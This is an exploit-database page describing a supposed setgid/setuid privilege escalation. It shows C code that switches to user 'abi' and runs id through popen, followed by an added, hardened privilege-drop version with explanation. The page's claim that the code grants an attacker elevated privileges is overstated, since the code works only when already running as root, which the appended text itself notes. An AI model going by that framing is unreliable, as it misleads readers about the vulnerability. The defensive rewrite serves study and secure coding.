Privilege Escalation via setgid and setuid functions - exploit.company
CVSS: 7.5 (HIGH)
Category: Privilege Escalation
CWE: 269

Privilege Escalation via setgid and setuid functions

This exploit leverages the setgid and setuid functions to escalate privileges. The program first retrieves the user 'abi' from the system's password file using getpwnam. Then, it sets the group ID and user ID to that of the 'abi' user. Finally, it executes the '/usr/bin/id' command using the popen function and prints the output. This allows an attacker to execute commands with elevated privileges.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and avoid using setgid and setuid functions without proper access control. Additionally, it is important to regularly update and patch the system to address any potential vulnerabilities.

Exploit-DB raw data:

#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>

int main(void)
{
    struct passwd *pw;
    FILE *pipe;
    char buf[25];

    /* Look up the target account; getpwnam() returns NULL if it does not exist. */
    pw = getpwnam("abi");
    if (pw == NULL) {
        fprintf(stderr, "user 'abi' not found\n");
        return 1;
    }

    /* Switch group first, then user; once the uid is unprivileged, setgid() would fail. */
    if (setgid(pw->pw_gid) != 0 || setuid(pw->pw_uid) != 0) {
        perror("setgid/setuid");
        return 1;
    }

    printf("my gid: %d\n", (int)getegid());
    printf("my uid: %d\n", (int)getuid());

    /* Run id(1) through a shell pipe and echo its output. */
    pipe = popen("/usr/bin/id", "r");
    if (pipe == NULL) {
        perror("popen");
        return 1;
    }
    while (fgets(buf, sizeof buf, pipe)) {
        printf("%s", buf);
    }
    printf("\n");
    pclose(pipe);
    return 0;
}
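The identity switch in the listing above only takes effect when the calling process already runs as root (or is a root-owned setuid binary), and the defects a defender cares about are the unchecked getpwnam() result and the ignored setgid()/setuid() return values that the mitigation section alludes to. The following is an added example, not code from the page or from Exploit-DB, showing the same privilege drop done defensively: it resolves the account, drops supplementary groups, then the primary group, then the uid (in that order, because the reverse order fails), checks every return value, verifies that root cannot be regained, and then runs id(1) directly with execl() instead of through popen()'s shell. The account name comes from argv; "abi" is only the name the original listing used, and lookup_uid/lookup_gid/drop_privileges are names chosen here.

```c
#define _DEFAULT_SOURCE
#include <sys/types.h>
#include <unistd.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>

/* Resolve a uid by account name. Returns the uid, or -1 if the account
 * does not exist (the original code dereferenced this NULL unchecked). */
long lookup_uid(const char *name)
{
    struct passwd *pw = getpwnam(name);
    return pw != NULL ? (long)pw->pw_uid : -1;
}

/* Same lookup for the account's primary gid. */
long lookup_gid(const char *name)
{
    struct passwd *pw = getpwnam(name);
    return pw != NULL ? (long)pw->pw_gid : -1;
}

/* Permanently switch the process to the named account. Returns 0 on
 * success and -1 on any failure. The caller must treat -1 as fatal: a
 * half-completed drop (groups changed, uid not) leaves the process with
 * an identity nobody designed for. */
int drop_privileges(const char *name)
{
    struct passwd *pw = getpwnam(name);
    if (pw == NULL) {
        fprintf(stderr, "drop_privileges: unknown account '%s'\n", name);
        return -1;
    }

    uid_t orig_euid = geteuid();

    /* Order matters: supplementary groups first, then the primary group,
     * then the uid. Once the uid is unprivileged the first two calls would
     * fail with EPERM, which is why setuid() must come last. setgroups()
     * itself needs root, so it is only attempted when we have it. */
    if (orig_euid == 0 && setgroups(1, &pw->pw_gid) != 0) {
        perror("setgroups");
        return -1;
    }
    if (setgid(pw->pw_gid) != 0) {
        perror("setgid");
        return -1;
    }
    if (setuid(pw->pw_uid) != 0) {
        perror("setuid");
        return -1;
    }

    /* Verify the drop is irreversible: if we started as root and moved to
     * a non-root uid, regaining uid 0 must now fail. */
    if (orig_euid == 0 && pw->pw_uid != 0 &&
        (setuid(0) == 0 || seteuid(0) == 0)) {
        fprintf(stderr, "drop_privileges: privileges could be regained\n");
        return -1;
    }

    /* Confirm real and effective ids both match the requested account. */
    if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid ||
        getgid() != pw->pw_gid || getegid() != pw->pw_gid) {
        fprintf(stderr, "drop_privileges: identity mismatch after drop\n");
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    /* Account name comes from the command line; "abi" is only the name
     * the original listing used (assumed example value). */
    const char *target = argc > 1 ? argv[1] : "abi";

    if (drop_privileges(target) != 0)
        return EXIT_FAILURE;

    printf("now running as uid %ld gid %ld\n",
           (long)getuid(), (long)getgid());

    /* Run id(1) directly instead of through popen()'s /bin/sh, so no shell
     * parses anything and the program path is fixed. */
    execl("/usr/bin/id", "id", (char *)NULL);
    perror("execl");
    return EXIT_FAILURE;
}
```

Run unprivileged, the program can only "drop" to the uid it already has, which is exactly the check that stops the listing's scenario: without root or a setuid-root binary, setuid() to another account fails with EPERM and the routine reports it instead of continuing as the wrong identity.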